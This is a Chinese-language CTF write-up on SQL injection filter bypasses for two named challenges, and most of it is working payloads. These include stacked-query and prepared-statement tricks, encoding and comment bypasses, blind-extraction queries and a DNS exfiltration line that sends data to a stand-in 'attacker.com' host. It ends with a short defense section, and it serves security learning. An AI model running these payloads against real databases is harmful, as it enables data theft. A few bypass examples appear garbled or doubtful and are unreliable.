SQL注入绕过技术与实战案例分析

1. 两道经典SQL注入题目的技术解析

这两道CTF题目在安全圈内颇具代表性，前者是2019年强网杯的"随便注"，后者是2020年GYCTF的"Blacklist"。作为Web安全领域的经典案例，它们分别展示了不同防御场景下的SQL注入突破技巧。我在实际渗透测试工作中发现，这类漏洞在企业系统中仍普遍存在。

2. 题目环境与基本测试

2.1 基础注入测试流程

面对任何SQL注入题目，我的标准测试流程是：

1. 单引号测试：输入'观察是否报错
2. 布尔测试：and 1=1 / and 1=2
3. 联合查询：order by确定列数后尝试union select
4. 报错注入：extractvalue/updatexml等函数
5. 时间盲注：sleep()函数配合条件判断

以"随便注"为例，输入单引号后得到报错信息：

code复制You have an error in your SQL syntax...

这确认了存在字符型注入漏洞。

2.2 关键过滤机制分析

"Blacklist"题目在防护上更为严格，经测试发现以下过滤：

• 空格被替换为%20
• select/union等关键词被拦截
• 常见注释符(-- # /*)被过滤
• 报错函数被禁用

3. 绕过技术深度解析

3.1 预处理语句绕过

当遇到关键词过滤时，可采用：

• 大小写混合：SeLeCt
• 内联注释：/!select/
• 字符编码：%53%45%4C%45%43%54
• 反引号包裹：select

在"Blacklist"中实测发现过滤不区分大小写，但内联注释有效：

sql复制1' /*!union*/ /*!select*/ 1,2,3--+

3.2 无列名注入技术

当information_schema被禁用时，可采用：

1. 使用sys.schema_table_statistics（MySQL >= 5.7）
2. 通过join利用已知表名爆列名：

sql复制1' union select * from (select * from users as a join users as b)as c--+

3. 利用子查询+别名逐位爆破：

sql复制1' and (select `2` from (select 1,2,3 union select * from users)a limit 1,1)='admin'--+

3.3 堆叠注入实战应用

"随便注"允许堆叠查询，这是突破的关键：

sql复制1'; show tables; -- 

获取表名后进一步：

sql复制1'; show columns from `1919810931114514`; --

最终通过预处理执行：

sql复制1'; set @sql=concat('sel','ect flag from `1919810931114514`'); prepare stmt from @sql; execute stmt;--+

4. 进阶绕过技术详解

4.1 十六进制编码绕过

当过滤引号时，可将字符串转为16进制：

sql复制0x61646D696E /* 等价于 'admin' */

在"Blacklist"中的应用：

sql复制1' and substr(user(),1,1)=0x72--+

4.2 科学计数法绕过空格

使用科学计数法代替空格：

sql复制1'e1(select(1))e1'1

等效于：

sql复制1' select 1 '1'

4.3 反引号特性利用

MySQL中反引号可包裹表名/列名：

sql复制select `column` from `table`

在表名是数字时尤为重要：

sql复制select * from `1919810931114514`

5. 防御方案与实战建议

5.1 企业级防护方案

基于这些绕过技术，建议采用：

1. 预编译语句（PDO/mysqli）
2. 最小权限原则（限制information_schema访问）
3. WAF规则需覆盖：
   • 各种编码变形
   • 注释符变种
   • 非常规空格（%0a/%0b等）
4. 禁用堆叠查询（multi_query=false）

5.2 渗透测试技巧

实际测试中的经验：

1. 多测试非常规注入点：
   • HTTP头部（X-Forwarded-For等）
   • JSON/XML参数
   • 文件上传字段名
2. 善用DNS外带数据：

   sql复制load_file(concat('\\\\',(select database()),'.attacker.com\\share'))
   

3. 时间盲注时使用：

   sql复制if(ascii(substr(user(),1,1))>100,sleep(3),0)
   

6. 题目完整解题过程

6.1 "随便注"详细步骤

1. 探测注入类型：

   sql复制1' and '1'='1  // 返回正常
   1' and '1'='2  // 无返回
   

2. 获取表名：

   sql复制1'; show tables; -- 
   

   返回：

   code复制1919810931114514
   words
   

3. 查看表结构：

   sql复制1'; show columns from `1919810931114514`; --
   

   发现flag字段

4. 最终payload：

   sql复制1'; set @sql=concat('sel','ect flag from `1919810931114514`'); prepare stmt from @sql; execute stmt;--+
   

6.2 "Blacklist"突破过程

1. 测试发现select被过滤，使用内联注释：

   sql复制1' /*!union*/ /*!select*/ 1,2,3--+
   

2. 发现information_schema不可用，改用：

   sql复制1' union select 1,table_name from mysql.innodb_table_stats--+
   

3. 获取flag表后，使用无列名注入：

   sql复制1' union select 1,(select group_concat(`2`) from (select 1,2 union select * from flag)a)--+
   

7. 常见问题与解决方案

7.1 堆叠注入不生效

可能原因：

• PHP配置中multi_query关闭
• 数据库用户权限不足
  解决方案：
• 尝试使用UNION注入
• 使用条件语句逐位提取：

  sql复制1' and if(ascii(substr((select database()),1,1))>100,1,0)--+
  

7.2 过滤绕过失败

调试技巧：

1. 逐步测试过滤规则：
   • 先测试单个关键词
   • 再测试组合语句
2. 尝试非常规语法：

   sql复制/*!50000select*/ 1
   

3. 使用变量拼接：

   sql复制set @a=0x73656c656374; prepare x from @a; execute x;
   

7.3 盲注效率优化

提升效率的方法：

1. 二分法加速判断：

   sql复制ascii(substr((select database()),1,1))>128
   

2. 使用位运算：

   sql复制(ascii(substr(user(),1,1))>>1)&1=1
   

3. 多线程并发测试

8. 防御进阶与新型攻击

8.1 最新防御技术

1. RASP（运行时应用自我保护）
2. 语义分析检测SQL注入
3. 机器学习模型识别异常查询
4. 数据库防火墙设置白名单

8.2 新型攻击手法

1. 基于JSON的注入：

   sql复制{"id":"1' union select 1,2,3--"}
   

2. GraphQL注入：

   graphql复制{user(id:"1' union select 1,2,3--")}
   

3. NoSQL注入：

   javascript复制username: {$ne: null}
   

在真实环境中，我遇到过一个案例：系统过滤了所有空格但允许%0a，最终通过以下方式突破：

sql复制1'%0aunion%0aselect%0a1,2,3%0afrom%0ausers--+

这种不断对抗的过程正是安全研究的魅力所在。建议开发者不仅要关注标准防护方案，更要理解攻击者的思维方式，才能构建真正安全的系统。